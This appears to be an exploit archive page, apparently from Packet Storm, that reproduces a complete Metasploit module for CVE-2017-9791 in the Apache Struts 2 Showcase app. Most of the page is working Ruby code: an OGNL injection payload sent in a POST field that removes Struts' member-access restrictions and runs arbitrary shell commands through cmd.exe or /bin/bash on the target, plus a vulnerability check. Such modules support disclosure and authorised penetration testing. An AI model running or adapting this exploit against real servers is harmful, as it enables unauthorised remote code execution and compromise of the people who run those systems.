what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution

Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
Posted May 16, 2018
Authored by Nixawk, icez, xfer0 | Site metasploit.com

This Metasploit module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote code execution can be performed via a malicious field value.

tags | exploit, remote, code execution
advisories | CVE-2017-9791
SHA-256 | 3343992f21f9ecb6b543f0313f63aef8d719b76b47b30afb63b5c6f1d0f8fd45

Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
'License' => MSF_LICENSE,
'Author' => [
'icez <ic3z at qq dot com>',
'Nixawk',
'xfer0'
],
'References' => [
[ 'CVE', '2017-9791' ],
[ 'BID', '99484' ],
[ 'EDB', '42324' ],
[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]
],
'Privileged' => true,
'Targets' => [
[
'Universal', {
'Platform' => %w{ linux unix win },
'Arch' => [ ARCH_CMD ]
}
]
],
'DisclosureDate' => 'Jul 07 2017',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])
]
)
end

def send_struts_request(ognl)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
uri = normalize_uri(datastore['TARGETURI'])

data = {
datastore['POSTPARAM'] => ognl,
'age' => var_a,
'__checkbox_bustedBefore' => 'true',
'description' => var_b
}

resp = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => data
})

if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end

def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
ognl = "%{'#{var_a}' + '#{var_b}'}"

begin
resp = send_struts_request(ognl)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end

if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end

def exploit
resp = exec_cmd(payload.encoded)
unless resp and resp.code == 200
fail_with(Failure::Unknown, "Exploit failed.")
end

print_good("Command executed")
print_line(resp.body)
end

def exec_cmd(cmd)
ognl = "%{(#_='multipart/form-data')."
ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
ognl << "(#_memberAccess?(#_memberAccess=#dm):"
ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
ognl << "(#ognlUtil.getExcludedPackageNames().clear())."
ognl << "(#ognlUtil.getExcludedClasses().clear())."
ognl << "(#context.setMemberAccess(#dm))))."
ognl << "(#cmd='#{cmd}')."
ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

send_struts_request(ognl)
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close